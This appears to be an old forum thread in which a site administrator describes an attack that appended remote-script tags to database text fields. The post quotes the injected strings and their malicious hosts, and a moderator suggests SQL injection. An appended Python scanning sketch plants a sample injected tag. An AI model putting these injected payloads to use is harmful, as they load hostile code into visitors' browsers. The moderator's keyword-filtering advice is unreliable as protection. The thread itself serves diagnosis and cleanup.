
virus script problem

Newbie
 
Join Date: Aug 2008
Posts: 1
#1: Aug 19 '08
Hello, I am a new member from Greece.

I am the administrator of a website and recently I had two similar virus problems.

Two weeks ago I suddenly found out that in many of the tables of my database (hosted in SQL Server 2005) a great many records had, at the end of many text fields, the string -- script src=http://www.lksr.ru/ngg.js>/script --

and a week later the string &"></title> script src="&chr(34)&"http://jjmaoduo.3322.org/csrss/w.js"&chr(34)&"> /script <!--.

That caused a major problem when someone tried to view information from the database. ZoneAlarm quarantined the virus Trojan-Downloader.JS.Agent.ccv.
I wrote some code to scan the database and replace every occurrence of this string with an empty string, and it was cleaned.

I am trying to figure out how this happened and what to do to avoid it next time.
How could anyone have gained access to the database and added the strings to almost all the tables?

Thanks
DrBunchman
Moderator
 
Join Date: Jan 2008
Location: Winchester, UK
Posts: 930
#2: Aug 19 '08

re: virus script problem


Hi stefmpiz,

Websites that allow the user to directly query the database can be vulnerable to SQL Injection attacks. This is where the malicious user is able to enter SQL directly into your database via your front end web page. Check out this article which explains how you can be vulnerable to SQL Injections in further detail.

There are some simple steps that you can take to protect yourself from most SQL Injections like checking all input strings for certain words and characters - there are some examples at the end of that article. If your website is out on the WWW then it is definitely worth protecting yourself as a matter of course.

I'm not saying that this is definitely what happened but it sounds pretty likely to me.

Hope this helps,

Dr B
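
The first post describes scanning every table for the appended script string. The sketch below is an added example of that scan, not code from either poster: it uses Python's sqlite3 as a stand-in for the SQL Server 2005 database, and the table names, rows and URL are constructed. It reports where each script tag sits and which source it loads, so the cleanup can be checked afterwards.

```python
import re
import sqlite3

# Opening script tag with a src attribute, quoted or unquoted.
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
TEXT_TYPES = ("CHAR", "TEXT", "CLOB")

def text_columns(conn):
    """Yield (table, column) for every text-typed column in the database."""
    tables = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
    for (table,) in tables.fetchall():
        # Names come from the database's own catalog, not from user input.
        for _cid, col, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(t in ctype.upper() for t in TEXT_TYPES):
                yield table, col

def scan(conn):
    """Return (table, column, rowid, script_src) for each stored script tag."""
    hits = []
    for table, col in text_columns(conn):
        rows = conn.execute(
            f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
            ("%<script%",))  # the search value is bound, never concatenated
        for rowid, value in rows:
            for m in SCRIPT_SRC.finditer(value):
                hits.append((table, col, rowid, m.group(1)))
    return hits

def build_sample():
    """Constructed sample database; every name and value here is made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name VARCHAR(50), descr TEXT, price REAL);
        CREATE TABLE news (id INTEGER, title NVARCHAR(80), body TEXT);
    """)
    bad = "<script src=http://injected.example/x.js></script>"
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", [
        (1, "Lamp", "Desk lamp", 19.5),
        (2, "Chair" + bad, "Oak chair" + bad, 80.0),
    ])
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", [
        (1, "Summer sale", "All items reduced." + bad),
        (2, "New <b>stock</b>", "Plain HTML is not flagged."),
    ])
    return conn

if __name__ == "__main__":
    for hit in scan(build_sample()):
        print(hit)
```

Running the same scan again after the cleanup should return an empty list; any remaining hit, or a hit with a new source URL, means the entry point is still open.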